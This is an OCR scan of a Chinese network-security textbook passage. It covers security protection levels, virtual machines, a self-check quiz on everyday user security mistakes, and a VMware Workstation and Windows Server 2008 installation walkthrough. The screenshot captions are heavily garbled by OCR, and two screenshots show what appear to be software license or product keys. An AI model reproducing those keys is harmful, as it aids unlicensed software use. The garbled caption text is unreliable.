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安全 保护 机 制 划分 成 关键 部 分 和 非 关键 部 分 相 结合 的 结构 ,其 中 关键 部 分 直接 控制 访问 者 
对 访问 对 象 的 存 取 。 本 级 具有 相当 强 的 抗 渗透 能 力 。 

(5) 访问 验证 保护 级 。 本 级 的 安全 保护 机 制 具备 结构 化 保护 级 的 所 有 安全 功能 ,并 特 
别 增设 访问 验证 功能 ,负责 仲裁 访问 者 对 访问 对 象 的 所 有 访问 活动 。 本 级 具有 极 强 的 抗 渗 
透 能 力 。 


1.3.5 虚拟 机 技术 


虚拟 机 (virtual machine) 指 通过 软件 模拟 的 具有 完整 硬件 系统 功能 的 、 运 行 在 一 个 完 
全 隔离 环境 中 的 完整 计算 机 系统 。 

通过 虚拟 机 软件 ,可 以 在 一 台 物 理 计算 机 上 模拟 出 一 台 或 多 台 虚 拟 的 计算 机 ,这 些 虚拟 
机 就 像 真正 的 计算 机 那样 进行 工作 ,例如 可 以 安装 操作 系统 、 安 装 应 用 程序 .访问 网 络 资源 
等 。 对 于 用 户 而 言 , 它 只 是 运行 在 用 户 物理 计算 机 上 的 一 个 应 用 程序 ;但 是 对 于 在 虚拟 机 中 
运行 的 应 用 程序 而 言 , 它 就 是 一 台 真正 的 计算 机 。 因 此 , 当 在 虚拟 机 中 进行 软件 评测 时 ,可 
能 系统 一 样 会 崩溃 ,但 是 ,崩溃 的 只 是 虚拟 机 上 的 操作 系统 ,而 不 是 物理 计算 机 上 的 操作 系 
统 , 并 且 使 用 虚拟 机 的 Undo( 恢 复 )? 功 能 ,可 以 马上 恢复 虚拟 机 到 安装 软件 之 前 的 状态 。 

目前 流行 的 虚拟 机 软件 有 VMware(VMWare ACE) .virtual box 和 virtual PC ,它们 都 
能 在 Windows 系统 上 虚拟 出 多 个 计算 机 。 在 本 书 的 网 络 安全 实验 中 ,为 了 方便 实验 的 进 
行 , 较 多 地 使 用 了 各 种 虚拟 机 来 搭建 网 络 安全 虚拟 实验 环境 ,如 Windows 2000 Server 虚拟 
机 、Windows Server 2008 虚拟 机 等 。 
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1.4.1 任务 1: 系统 安全 * 傻 事 清单 ” 


以 下 是 一 些 普通 的 计算 机 用 户 经 常会 犯 的 安全 性 错误 ,请 对 照 并 根据 自己 的 实际 情况 
做 出 选择 (在 供 选 择 的 答案 前 面 打 “V”。 注 意 : 单 选 )。 

(1) 使 用 没有 过 电压 保护 的 电源 。 这 个 错误 真 的 能 够 毁 掉 计算 机 设备 以 及 上 面 所 保存 
的 数据 。 用 户 可 能 以 为 只 在 雷电 发 生 时 ,系统 才 会 有 危险 ,但 其 实 任何 能 够 干扰 电路 并 使 电 
流 回流 的 因素 都 能 烧 焦 用 户 的 设备 元 件 。 有 时 甚至 一 个 简单 的 动作 ,比如 打开 与 计算 机 设 
备 在 同一 个 电路 中 的 设备 (如 电 吹 风 、 电 加 热 器 或 者 空调 等 高 压 电器 ) 就 能 导致 电 涌 。 如 果 
遇 到 停电 , 当 恢复 电力 供应 时 也 会 出 现 电 涌 。 

使 用 电 涌 保 护 器 就 能 够 保护 系统 免 受 电 涌 的 危害 ,但 是 请 记 住 , 大 部 分 价钱 便宜 的 电 涌 
保护 器 只 能 抵御 一 次 电 涌 , 随 后 需要 进行 更 换 。 不 间断 电源 (UPS) 更 胜 于 电 涌 保护 器 ,UPS 
的 电池 能 使 电流 趋 于 平稳 ,即使 断 电 ,也 能 给 用 户 提供 时 间 , 从 容 地 关闭 设备 。 




















请 选择 : 
A. 我 懂 并 已 经 做 到 了 口 B. 我 懂得 一 点 ,但 觉得 没 必 要 
C. 知道 电 涵 的 厉害 ,但 不 知道 UPS D. 现在 刚 知道 ,我 会 关注 这 一 点 
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E. 我 觉得 这 个 不 重要 ,不 知道 也 无 所 谓 

(2) 不 使 用 防火 墙 就 上 网 。 许 多 家 庭 用 户 会 毫 不 犹 殉 地 启动 计算 机 开始 上 网 ,而 没有 
意识 到 他 们 正 将 自己 暴露 在 病毒 和 入 侵 者 面前 。 无 论 是 宽带 调制 解 调 器 或 者 路 由 器 中 内 置 
的 防火 墙 ,还 是 调制 解 调 器 或 路 由 器 与 计算 机 之 间 的 独立 防火 墙 设备 ,或 者 是 在 网 络 边缘 运 
行 防火 墙 软件 的 服务 器 ,或 者 是 计算 机 上 安装 的 个 人 防火 墙 软件 (如 Windows 7 中 内 置 的 
防火 墙 ,或 者 是 第 三 方 防火 墙 软件 ) ,总 之 ,所 有 与 互联 网 相连 的 计算 机 都 应 该 得 到 防火 墙 的 
保护 。 

在 笔记 本 电脑 上 安装 个 人 防火 墙 的 好 处 在 于 , 当 用 户 带 着 笔记 本 电脑 上 路 或 者 插入 酒 
店 的 上 网 端口 ,或 者 与 无 线 热点 相连 接 时 ,已 经 有 了 防火 墙 。 拥 有 防火 墙 不 是 全 部 ,还 需要 
确认 防火 墙 是 否 已 经 开启 ,并 且 配 置 得 当 , 能 够 发 挥 保护 作用 。 























请 选择 : 
A. 我 懂 并 已 经 做 到 了 口 B. 我 懂得 一 点 ,但 觉得 没 必要 
C. 知道 有 防火 墙 但 没有 用 过 口 D. 现在 刚 知道 ,我 会 关注 这 一 点 
E. 我 觉得 这 个 不 重要 ,不 知道 也 无 所 谓 











(3) 忽视 防 病毒 软件 和 防 间谍 软件 的 运行 和 升级 。 事 实 上 , 防 病毒 程序 令 人 讨厌 , 它 总 
是 阻 断 一 些 用户 想 要 使 用 的 应 用 ,而 且 为 了 保证 效用 还 需要 经 常 升级 ,在 很 多 情况 下 升级 都 
是 收费 的 。 但 是 ,尽管 如 此 ,在 现在 的 应 用 环境 下 ,用 户 是 无 法 承担 不 使 用 防 病毒 软件 所 带 
来 的 后 果 的 。 病 毒 . 木 马 、 蠕 虫 等 恶意 程序 不 仅 会 削弱 和 破坏 系统 ,还 能 通过 用 户 的 计算 机 
向 网 络 其 他 部 分 散播 病毒 。 在 极端 情况 下 ,甚至 能 够 破坏 整个 网 络 。 

间谍 软件 是 另外 一 种 不 断 增加 的 威胁 。 这 些 软件 能 够 自行 在 计算 机 上 进行 安装 (通常 
都 是 在 用 户 不 知道 的 情况 下 ) ,搜集 系统 中 的 情报 ,然后 发 送 给 间谍 软件 程序 的 作者 或 销售 
商 。 防 病毒 程序 经 常 无 法 察觉 间谍 软件 ,因此 需要 使 用 专业 的 间谍 软件 探测 清除 软件 。 

请 选择 : 
A. 我 懂 并 已 经 做 到 了 
C. 知道 防 病毒 ,但 不 知道 防 间谍 
E. 我 觉得 这 个 不 重要 ,不 知道 也 无 所 谓 

(4) 安装 和 和 印 载 大 量程 序 , 特 别 是 测试 版 程序 。 由 于 用 户 对 新 技术 的 热情 和 好 奇 ,经 常 
安装 和 尝试 新 软件 。 免 费 提供 的 测试 版 程序 甚至 盗版 软件 能 够 使 用 户 有 机 会 抢先 体验 新 的 
功能 。 另 外 还 有 许多 可 以 从 网 上 下 载 的 免费 软件 和 共享 软件 。 

但 是 ,安装 软件 的 数量 越 多 ,使 用 含有 恶意 代码 的 软件 ,或 者 使 用 编写 不 合理 的 软件 而 
可 能 导致 系统 工作 不 正常 的 概率 就 高 。 这 样 的 风险 远 高 于 使 用 盗版 软件 。 另 外 ,过 多 的 安 
装 和 伯 载 也 会 弄 乱 Windows 的 系统 注册 表 ,因为 并 不 是 所 有 的 务 载 步骤 都 能 将 程序 剩余 部 
分 清理 干净 ,这 样 的 行为 会 导致 系统 逐渐 变 慢 。 
用 户 应 该 只 安装 自己 真正 需要 使 用 的 软件 ,只 使 用 合法 软件 ,并 且 尽 量 减 少 安装 和 缉 载 
软件 的 数量 。 
请 选择 : 
A. 我 懂 并 已 经 做 到 了 
C. 有 点 了 解 但 不 知道 什么 是 注册 表 
E. 我 觉得 这 个 不 重要 ,不 知道 也 无 所 谓 








B. 我 懂得 一 点 ,但 觉得 没 必要 
D. 现在 刚 知道 ,我 会 关注 这 一 点 





辐 
加 























B. 我 介 得 一 点 ,但 觉得 没 必要 
D. 现在 刚 知道 ,我 会 关注 这 一 点 








回回 
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(5) 磁盘 总 是 满 满 的 并 且 非 常 凌乱 。 频 繁 安装 和 种 载 程序 (或 增加 和 删除 任何 类 型 的 
数据 ) 都 会 使 磁盘 变 得 零散 。 信 息 在 磁盘 上 的 保存 方式 导致 了 磁盘 碎片 的 产生 ,这 样 就 使 得 
磁盘 文件 变 得 零散 或 者 分 裂 。 然 后 在 访问 文件 时 ,磁头 不 会 同时 找到 文件 的 所 有 部 分 ,而 是 
到 磁盘 的 不 同 地 址 上 找 回 全 部 文件 ,这 样 使 得 访问 速度 变 慢 。 如 果 文 件 是 程序 的 一 部 分 , 程 
序 的 运行 速度 就 会 变 慢 。 

可 以 使 用 Windows 自 带 的 “磁盘 碎片 整理 ”工具 (在 Windows 中 ,选择 “开始 ”>“ 所 有 
程序 ”一 附件 ”系统 工具 ”一 磁盘 碎片 整理 程序 ”命令 ) 来 重新 安排 文件 的 各 个 部 分 ,以 
使 文件 在 磁盘 上 能 够 连续 存放 。 

另外 一 个 常见 的 能 够 导致 性 能 问题 和 应 用 行为 不 当 的 原因 是 磁盘 过 满 。 许 多 程序 都 会 
生成 临时 文件 ,运行 时 需要 磁盘 提供 额外 空间 。 

请 选择 : 

A. 我 懂 并 已 经 做 到 了 
C. 有 点 知道 但 不 慌 *“ 磁 盘 碎 片 整理 ” 
E. 我 觉得 这 个 不 重要 ,不 知道 也 无 所 谓 

(6) 打开 所 有 的 附件 。 收 到 带 有 附件 的 电子 邮件 就 好 像 收 到 一 份 意外 的 礼物 ,总 是 想 
窥视 一 下 是 什么 内 容 。 但 是 ,电子 邮件 的 附件 可 能 包含 能 够 删除 文件 或 系统 文件 夹 ,或 者 向 
地 址 竹中 所 有 联系 人 发 送 病 毒 的 编码 。 

最 容易 被 洞察 的 危险 附件 是 可 执行 文件 ( 即 扩展 名 为 .exe、 com 的 文件 ) 以 及 其 他 很 
多 类 型 。 不 能 自行 运行 的 文件 ,如 Word 的 . doc 和 Excel 的 . xls 文件 等 ,其 中 能 够 含有 内 
置 的 宏 。 脚 本 文件 (Visual Basic JavaScript\Flash 等 ) 不 能 被 计算 机 直接 执行 ,但 是 可 以 通 
过 程序 进行 运行 。 

过 去 一 般 认 为 纯 文本 文件 (. txt) 或 图 片 文件 (. gif、. jpg、. bmp) 是 安全 的 ,但 现在 也 不 
是 了 。 文 件 扩展 名 也 可 以 伪装 ,入侵 者 能 够 利用 Windows 默认 的 不 显示 普通 的 文件 扩展 名 
的 特性 设置 ,将 可 执行 文件 名 称 设 为 类 似 greatfile. jpg. exe 这 样 。 实 际 的 扩展 名 被 隐藏 起 
来 ,只 显示 为 greatfile. jpg。 这 样 收 件 人 会 以 为 它 是 图 片 文件 ,但 实际 上 却 是 恶意 程序 。 
用 户 只 能 在 确信 附件 来 源 可 靠 并 且 知 道 是 什么 内 容 的 情况 下 才 可 以 打开 附件 。 即 使 带 
有 附件 的 邮件 看 起 来 似乎 来 自用 户 可 以 信任 的 人 ,也 有 可 能 是 某 些 人 将 他 们 的 地 址 伪装 成 
这 样 ,甚至 是 发 件 人 的 计算 机 已 经 感染 了 病毒 ,在 他 们 不 知情 的 情况 下 发 送 了 附件 。 

请 选择 : 

A. 我 懂 并 已 经 做 到 了 

口 C. 知道 附件 危险 但 不 太 了 解 扩展 名 

E. 我 觉得 这 个 不 重要 ,不 知道 也 无 所 谓 

(7) 单 击 所 有 链接 。 打 开 附 件 不 是 鼠标 所 能 带 给 用 户 的 唯一 麻烦 。 单 击 电子 邮件 或 者 
网 页 上 的 超级 链接 ,能 将 用 户 带 入 植 和 人 ActiveX 控件 或 者 脚本 的 网 页 ,利用 这 些 就 可 能 进行 
各 种 类 型 的 恶意 行为 ,如 清除 硬盘 ,或 者 在 计算 机 上 安装 后 门 软件 ,这 样 黑客 就 可 以 潜入 并 
夺取 控制 权 。 

单 击 错 了 链接 也 可 能 会 带 着 用 户 进 入 具有 色情 图 片 、 盗 版 音乐 或 软件 等 不 良 内 容 的 网 
站 。 如 果 用 户 使 用 的 是 工作 计算 机 ,就 可 能 会 因此 麻烦 缠身 ,甚至 惹 上 官司 。 

在 单 击 链接 之 前 请 务必 谨慎 一 些 。 有 些 链接 可 能 被 伪装 在 网 络 钓鱼 信息 或 者 那些 可 能 将 用 
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B. 我 懂得 一 点 ,但 觉得 不 重要 
D. 现在 刚 知 道 ,我 会 关注 这 一 点 





口 口 


























B. 我 懂得 一 点 ,但 觉得 并 不 严重 
D. 现在 刚 知道 ,我 会 关注 这 一 点 











口 
口 
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户 带 到 别 的 网 站 的 网 页 里 。 例 如 ,链接 地 址 可 能 是 www. a. com, 但 实际 上 会 指向 www. b. com。 
一 般 情况 下 ,用 鼠标 在 链接 上 滑 过 而 不 要 单 击 ,就 可 以 看 到 实际 的 URL 地 址 。 





























请 选择 : 
A. 我 懂 并 已 经 做 到 了 口 B. 我 懂得 一 点 ,但 觉得 并 不 严重 
C. 以 前 遇 到 过 但 没有 深入 考虑 D. 现在 刚 知道 ,我 会 关注 这 一 点 
E. 我 觉得 这 个 不 重要 ,不 知道 也 无 所 谓 











(8) 共享 或 类 似 共享 的 行为 。 分 享 是 一 种 良好 的 行为 ,但 是 在 网 络 上 ,分享 则 可 能 将 用 
户 暴露 在 危险 之 中 。 如 果 用 户 允 许 文 件 和 打印 机 共享 ,别人 就 可 以 远程 与 用 户 的 计算 机 连 
接 , 并 访问 用 户 的 数据 。 即 使 没有 设置 共享 文件 夹 ,在 默认 情况 下 , Windows 系统 会 隐藏 每 
块 磁盘 根 目录 上 可 管理 的 共享 。 一 个 黑客 高 手 有 可 能 利用 这 些 共 享 侵入 用 户 的 计算 机 。 解 
决 方法 之 一 就 是 ,如 果 用 户 不 需要 网 络 访问 用 户 计 算 机 上 的 任何 文件 ,就 请 关闭 文件 和 打印 
机 共享 。 如 果 确 实 需 要 共享 某 些 文件 夹 , 请 务必 通过 共享 级 许可 和 文件 级 (NTFS) 许 可 对 
文件 夹 进行 保护 。 另 外 ,还 要 确保 用 户 账号 和 本 地 管理 员 账 号 的 密码 足够 安全 。 

请 选择 : 

. 我 仅 并 已 经 做 到 了 

我 懂得 一 点 ,但 觉得 并 不 严重 

C. 知道 共享 文件 和 文件 夹 有 危险 ,但 不 知道 共享 打印 机 也 危险 
D. 现在 刚 知 道 ,我 会 关注 这 一 点 

E. 我 觉得 这 个 不 重要 ,不 知道 也 无 所 谓 

(9) 用 错 密码 。 这 也 是 使 得 人 们 暴露 在 入 侵 者 面前 的 又 一 个 常见 错误 。 即 使 网 络 管 理 
员 并 没有 强迫 用 户 选择 强大 的 密码 并 定期 更 换 , 用 户 也 应 该 自觉 这 样 做 。 不 要 选用 容易 被 
猜 中 的 密码 , 且 密 码 越 长 越 不 容易 被 破解 。 因 此 ,建议 用 户 的 密码 至 少 为 8 位 。 常 用 的 密码 
破解 方法 是 采用 “字典 ”破解 法 ,因此 ,不 要 使 用 字典 中 能 查 到 的 单词 作为 密码 。 为 安全 起 
见 ,密码 应 该 由 字母 ,数字 以 及 符号 组 合 而 成 。 很 长 的 无 意义 的 字符 串 密码 很 难 被 破解 ,但 
是 如 果 用 户 因 为 记 不 住 密码 而 不 得 不 将 密码 写 下 来 ,就 违背 了 设置 密码 的 初衷, 因为 人 侵 者 
可 能 会 找到 密码 。 例 如 ,可 以 造 一 个 容易 记 住 的 短语 ,并 使 用 每 个 单词 的 第 一 个 字母 ,以 及 
数字 和 符号 生成 一 个 密码 。 

请 选择 : 

A. 我 懂 并 已 经 做 到 了 
C. 知道 密码 但 不 了 解密 码 
口 E. 我 觉得 这 个 不 重要 ,不 知道 也 无 所 谓 

(10) 忽视 对 备份 和 恢复 计划 的 需要 。 即 使 用 户 听取 了 所 有 的 建议 ,入 侵 者 依然 可 能 和 弄 
垮 用 户 的 系统 ,用 户 的 数据 可 能 遭 到 自 改 ,或 因 硬 件 问 题 而 被 控 除 。 因 此 ,备份 重要 信息 , 制 
订 系 统 故障 时 的 恢复 计划 是 相当 必要 的 。 

大 部 分 计算 机 用 户 都 知道 应 该 备份 ,但 是 许多 用 户 从 来 都 不 进行 备份 ,或 者 最 初 做 过 备 
份 但 是 从 来 都 不 定期 对 备份 进行 升级 。 应 该 使 用 内 置 的 Windows 备份 程序 或 者 第 三 方 备 
份 程序 以 及 可 以 自动 进行 备份 的 定期 备份 程序 。 所 备份 的 数据 应 当 保存 在 网 络 服务 器 或 者 
远离 计算 机 的 移动 存储 器 中 ,以 防止 洪水 ,火灾 等 灾难 情况 的 发 生 。 

请 牢记 数据 是 用 户 计 算 机 上 最 重要 的 东西 。 操 作 系统 和 应 用 程序 都 可 以 重新 安装 ,但 
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B. 我 懂得 一 点 ,但 觉得 并 不 严重 
D. 现在 刚 知道 ,我 会 关注 这 一 点 
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外 建 原始 数据 则 是 难度 很 高 甚至 根本 无 法 完成 的 任务 。 






































请 选择 : 
A. 我 懂 并 已 经 做 到 了 B. 我 介 得 一 点 ,但 灾难 毕竟 很 少 
C. 知道 备份 重要 但 不 会 应 用 D. 现在 刚 知道 ,我 会 关注 这 一 点 
E. 我 觉得 这 个 不 重要 ,不 知道 也 无 所 谓 








请 汇总 并 分 析 : 上 述 10 个 安全 问题 ,如 果 A 选项 为 10 分 ,B 选项 为 8 分 ,C 选项 为 
6 分 ,D 选项 为 4 分 ,E 选项 为 2 分 .请 汇总 ,你 的 得 分 是 i 

用 户 总 是 会 用 层出不穷 的 方法 给 自己 惹 上 麻烦 。 与 用 户 的 同学 和 朋友 们 分 享 这 个 “ 傻 
事 清单 ”, 将 能 够 避免 他 们 犯 这 些 原本 可 以 避免 发 生 的 错误 。 请 简 述 自己 的 看 法 。 





1.4.2 任务 2: VMware 虚拟 机 的 安装 与 使 用 


1. 任务 目标 

(1) 了 解 虚拟 机 技术 在 网 络 安全 实 训 项 目 中 的 应 用 。 

(2) 掌握 VMware Workstation 虚拟 机 软件 的 使 用 方法 。 

2. 任务 内 容 

(1) 安装 VMware Workstation 软件 。 

(2) 安装 Windows Server 2008 操作 系统 。 

(3) VMware 虚拟 机 功能 设置 。 

3. 完成 任务 所 需 的 设备 和 软件 

(1) 安装 有 Windows 7 操作 系统 的 计算 机 1 台 。 

(2) VMware Workstation 9. 0 软件 。 

(3) Windows Server 2008 安装 光盘 或 ISO 镜像 文件 。 

4. 任务 实施 步骤 

1) 安装 VMware Workstation 软件 

访问 VMware 公司 的 官方 网 站 (http://www. vmware. com/cn/) ,下载 最 新 版 本 的 
VMware Workstation 软件 ,下 面 使 用 VMware Workstation 9. 0 安装 虚拟 机 ,并 在 其 上 安 
装 Windows Server 2008 操作 系统 软件 。 

步骤 1: 双击 下 载 的 安装 程序 包 , 进 入 程序 的 安装 过 程 。 安 装 包 下 载 完成 之 后 ,进入 安 
装 向 导 界 面 ,如 图 1-3 所 示 。 单 击 Next 按钮 ,进入 选择 安装 类 型 界面 ,如 图 1-4 所 示 。 

步骤 2: 单 击 Typical 按钮 ,进入 安装 路 径 设置 界面 ,如 图 1-5 所 示 。 如 果 要 更 改 安装 路 
径 , 可 单 击 Change 按钮 进行 更 改 ,如 选择 D:\VM 9.0 安装 路 径 。 

步骤 3: 单 击 Next 按钮 ,进入 软件 更 新 设置 界面 ,如 图 1-6 所 示 。 选 中 Check for 
product updates on startup 复 选 框 ,这 样 可 在 程序 启动 的 时 候 检查 软件 的 更 新 。 

步骤 4: 单 击 Next 按钮 ,进入 用 户 信息 反馈 设置 界面 ,如 图 1-7 所 示 。 取 消 选 中 Help 
improve VMware Workstation 复 选 框 ,这 样 不 会 发 送 匿名 的 系统 数据 和 使 用 统计 信息 给 
VMware 公司 。 

步骤 5: 单 击 Next 按钮 ,进入 快捷 方式 设置 界面 ,如 图 1-8 所 示 。 根 据 需 要 可 以 选中 
Desktop 和 Start Menu Programs folder 复 选 框 。 
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VMware Workstation Setup 





Welcome to the installation wizard for VMware 
Workstation 


The instalation wizard wil alow you to modify, repair, or remove 
VMware Workstation. To continue, did Next. 


WARNING: This program is protected by copyright law and 
international treates. 


hware: 


Workstation 9 





[see> 
图 1-3 安装 向 导 




















Setup Type 
Choose the setup type that best suits your needs. 


Iypical 
Typical program features wil be nstaled. 








Custom 
介 Choose which program features you want installed and where they wil be 
nstalled. Recommended for advanced users. 





图 1-4 选择 安装 类 型 





Destination Folder 
Cidk Next toinstal to this folder or cick Change toinstal to a different folder. 


况 Instal VMware Workstation to: 


C:\Program Fies\WMware WMware Workstation\ 














图 1-5 安装 路 径 设置 
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Software 
When ， you like to check for updates of your software? 





图 1-7 用 户 信息 反馈 设置 


Shortcuts 
Select the shortcuts you wish to place on your system 





图 1-8 快捷 方式 设置 
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步骤 6: 单 击 Next 按钮 ,进入 准备 正式 安装 界面 ,如 图 1-9 所 示 。 单 击 Continue 按钮 ， 
开始 正式 安装 。 





Ready to Perform the Requested Operations [a 


Chick Continue to begn the process. 


于 you want to review or change any of your instalation settings, cick Back. Cick Cancel to 
et the wizard. 





se] Eee Eee 
图 1-9 准备 正式 安装 




















步骤 7: 安装 完成 后 , 单 击 Next 按钮 ,出 现 要 求 输入 License Key 的 界面 ,如 图 1-10 所 
示 。 输 入 License Key 后 , 单 击 Enter 按钮 。 


Enter License Key 
{optional) You can enter this information later. 


Vcense Key: 0000030000(30000( 30000(300000 
NF0H6-4R185-1Z6A8-UC8QP-2AQLM 














图 1-10 输入 License Key 


步骤 8: 如 果 输 入 的 License Key 正确 , 则 出 现 安装 向 导 完 成 界面 ,如 图 1-11 所 示 。 单 
击 Finish 按钮 完成 安装 。 

步骤 9: 选择 “开始 ”一 “ 所 有 程序 ”~“*VMware”- 一 “VMware Workstation” 命 令 ,出 现 
认证 许可 协议 界面 ,如 图 1-12 所 示 。 

步骤 10: 选中 “Yes,I accept the terms in the license agreement” 单 选 按 钮 后 , 单 击 OK 
按钮 ,进入 VMware Workstation 程序 主 界面 。 

由 于 VMware Workstation 程序 主 界面 是 英文 的 ,用 户 使 用 不 方便 ,用 户 可 安装 相应 的 
汉化 包 软 件 , 安 装 汉化 包 软 件 后 的 程序 主 界面 如 图 1-13 所 示 。 
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Setup Wizard Complete 


The setup wizard has successfuly completed is operations 
related to VMware Workstation. Cick Fnish to et the wizard. 


Workstation 9 








License Agreement 
Please read the folowng icense agreement carefidy. 


KC Yes, 1 accept the terms n the hcense agreement 


© No, 1 do not 3crept The Terms mn The Kcense agreement 


图 1-11 安装 向 导 完 成 






VMWARE END USER LICENSE AGREEMENT 


PLEASE NOTE THAT THE TERMS OF THIS END USER LICENSE AGREEMENT 














ZK。 和 归咎 梳 区 WV) 











Pp-l 过 lg 
库 
EE - 
EE 

Ee 











1-12 认证 许可 协议 


二 WM) 款 答 (T) 莫 册 GT) - 
| 思 串 思 钙 | 癌 


VMware Workstation 9 


MER 起 型 同和 从 名 下 
上 个 Ett 莽 员 上 的 穴 扫 机 的 网 站 各 





ep Worktotion 参数 
| Hist Fim EX VMware Workstation 设置 
”i 3 ns 
HE [ | as vmware Worketsticn 于 
上 风化 -个 泊 本 机 一 
na 奸 一 个 衬 HL 上 = vmware Workstaticn md 




















图 1-13 汉化 后 的 程序 主 界面 
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2) 安装 Windows Server 2008 操作 系统 
安装 完 虚拟 机 后 ,就 如 同 组 装 了 一 台新 的 计算 机 ,因而 需要 安装 操作 系统 。 
步骤 1: 单 击 图 1-13 中 的 “新 建 虚拟 机 ”按钮 ,或 选择 “文件 ”一 “新 建 虚拟 机 ”命令 ,出 现 


“新 建 虚拟 机 向 导 ” 对 话 框 ,如 图 1-14 所 示 。 














新 建 上 所 机 向 导 [一 > 
欢迎 使 用 新 建 虚拟 机 向 导 
作 起 要 什么 类 型 二 轩 ? 
多 8 妇 一 个 Workstation 9.0 





TIT 
虚拟 机 * 
自 定义 (高 级 XC) 


自 定义 选 顺 : 可 以 更 改 SCSI 适 本 车 和 康 拟 磁 
Vere 产 9 交 和 


Workstation 9 














Es | F002 
图 1-14 “新 建 虚拟 机 向 导 ” 对 话 框 











步骤 2: 选中 “标准 (推荐 )" 单 选 按钮 后 , 单 击 “ 下 一 步 ” 按 钮 ,出 现 操作 系统 安装 来 源 选 
择 界面 ,如 图 1-15 所 示 。 选 中 “安装 盘 镜 像 文 件 (iso)" 单 选 按钮 后 , 单 击 “ 浏 览 ” 按 钮 ,选择 


Windows Server 2008 安装 镜像 文件 (如 D:\Windows 2008.iso) 。 


| 





新 建 虚拟 机 向 导 


安装 客户 机 操作 系统 
i 它 需 要 一 个 操作 系统 。 你 将 如 何 安装 客户 机 操作 系 





安装 从 : 
安装 盘 (D) 
无 可 用 驱动 器 


辐 安装 盘 锁 像 文件 (so)M): 
D:\Wndows 2008.so ~ 浏览 (R)… 


是 无 法 该 取 此 文件 
指定 一 个 另外 的 文件 ， 或 选择 一 个 另外 的 选项 以 继续 。 


我 以 后 再 安装 操作 系统 (5)。 
创建 一 个 虚拟 空白 硬盘 。 




















] [ ed] 下 — 步 (N 





帮助 








图 1-15 选择 操作 系统 安装 来 源 
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步骤 3: 单 击 “ 下 一 步 ” 按 钮 ,出 现 系统 安装 信息 界面 ,如 图 1-16 所 示 。 输 入 安装 系统 的 
Windows 产品 密 钥 ,以 及 安装 的 Windows 版 本 ,同时 可 设置 系统 的 账户 名 称 及 密码 。 

ae 


Easy Install 信息 
这 用 于 安装 Windows Server 2008 R2 x64。 
























Windows 产品 密 钥 (K) 


5C6V8-D7100- EZNZ1- 8H2G2- A2SNN 
"> 
> 


个 性 化 Wndows 
完整 名 称 (F) Administrator 

















密码 (P): 
确认 (C); 








口 自动 登录 (需要 密码 ) (A) 





帮助 | 








图 1-16 系统 安装 信息 


步骤 4: 单 击 “ 下 一 步 ” 按 钮 ,出 现 设 置 虚拟 机 名 称 和 位 置 界面 ,如 图 1-17 所 示 。 在 “ 虚 
拟 机 名 称 ” 文 本 框 中 输入 虚拟 机 名 称 ( 如 Windows Server 2008 R2 x64) ,在 “位 置 " 文 本 框 中 
输入 操作 系统 的 存放 路 径 ( 如 D:\Windows Server 2008 R2 x64)。 
iene MM 















名 虚拟 机 
你 想 要 该 此 虚拟 机 使 用 什么 名 称 人 





虚拟 机 名 和 
dows Server 2008 R2 x64 


位 置 (D: 


D:\Windows Server 2008 R2 x64 


避 以 通过 编辑 > 参数 菜单 来 欢 亦 默 认 位 置 。 


















































图 1-17 设置 虚拟 机 名 称 和 位 置 
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步骤 5: 单 击 “ 下 一 步 ” 按 钮 ,出 现 指定 磁盘 容量 界面 ,如 图 1-18 所 示 。 设 置 最 大 磁盘 空 
间 为 40GB。 








虚拟 机 的 硬盘 被 作为 一 个 或 多 个 文件 存 鱼 到 主机 物理 磋 盘 上 。 这 些 文件 最 初 会 非 
常 小 但 随 着 你 添加 应 用 程序 、 文 件 和 数据 ， 它 会 十 来 越 大 。 


最 大 碰 盘 空间 (GB)(S): 40.0 自 
Windows Server 2008 R2 x64 推荐 大 小 : 40 GB 


回 单个 文件 存 全 虚拟 磁盘 (O) 
日 虚 以 磁盘 拆 分 成 条 个 文件 (M) 
分 割 赔 盘 可 以 更 奉 易 地 将 虚拟 机 迁移 到 另 一 台 计 算 机 上 ， 但 会 大 幅 低 磅 盘 性 能 。 








图 1-18 指定 磁盘 容量 
步骤 6: 单 击 * 下 一 步 ” 按 钮 ,出 现 准备 创建 虚拟 机 界面 ,如 图 1-19 所 示 。 





创建 虚拟 机 
单 击 " 完 成 "来 创建 虚拟 机 并 开始 安装 Windows Server 2008 R2 x64， 然后 安 
装 VMware Tools。 





庶 氢 机 将 按 以 下 设置 被 创建 : 

名 称 Windows Server 2008 R2 x64 
DAWindows Server 2008 R2 x64 
Workstation 9.0 
Windows Server 2008 R2 x64 





























图 1-19 准备 创建 虚拟 机 


步骤 7: 单 击 “定制 硬件 ”按钮 ,打开 * 硬 件 ? 对 话 框 , 单 击 * 网 络 适 配器 NAT” 选 项 后 ,在 
“网 络 连接 ”区域 中 选中 ”桥接 : 直接 连接 到 物理 网 络 " 单 选 按钮 ,如 图 1-20 所 示 。 
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设备 摘要 设备 扩 态 
桓 内存 7 口 忆 演 接 (C) 
国 打开 电源 9 连接 (O) 


同 处 理 器 1 
入 新 CD/DVD (1DE) ”使 用 文件 D;\Wndows 2008.50 


过失 
EI 
这 (P) 

人 NAT: 全 用 已 失 记 的 主机 地 址 (N) 

站 Hostonl 与 主机 共享 一 个 私有 有 络 (H) 

© 定 X: 括 的 由 KR 络 

Vunetd ( 搓 
sa: 


















































图 1-20 “硬件 ”对 话 框 


步骤 8: 单 击 “ 关 闭 "按钮 ,返回 准备 创建 虚拟 机 界面 , 单 击 “ 完 成 "按钮 。 

此 后 ,VMware 虚拟 机 会 根据 安装 镜像 文件 开始 安装 Windows Server 2008 操作 系统 ， 
按照 安装 向 导 提 示 完 成 Windows Server 2008 操作 系统 的 安装 。 

说 了 明 VMware Workstation 9.0 的 网 络 连接 设置 共有 5 种 不 同 的 方式 。 

G 桥接 (bridged) 方 式 : 这 种 方式 是 将 虚拟 系统 接 入 网 络 最 简单 的 方法 。 虚 拟 系统 的 
IP 地 址 可 设置 成 与 宿主 机 系统 在 同一 网 段 , 虚 拟 系统 相当 于 网 络 内 的 一 台独 立 的 机 器 ,与 
宿主 机 系统 就 像 连接 在 同一 个 集线器 (HUB) 上 ,网 络 内 的 其 他 机 器 可 访问 虚拟 系统 ,虚拟 
系统 也 可 访问 网 络 内 的 其 他 机 器 ,当然 与 宿主 机 系统 的 双向 访问 也 不 成 问题 。 

加 NAT( 网 络 地 址 转换 ) 方 式 : 这 种 方式 也 可 以 实现 宿主 机 系统 与 虚拟 系统 的 双向 访 
问 ,但 网 络 内 其 他 机 器 不 能 访问 虚拟 系统 ,虚拟 系统 可 通过 宿主 机 系统 用 NAT 协议 访问 网 
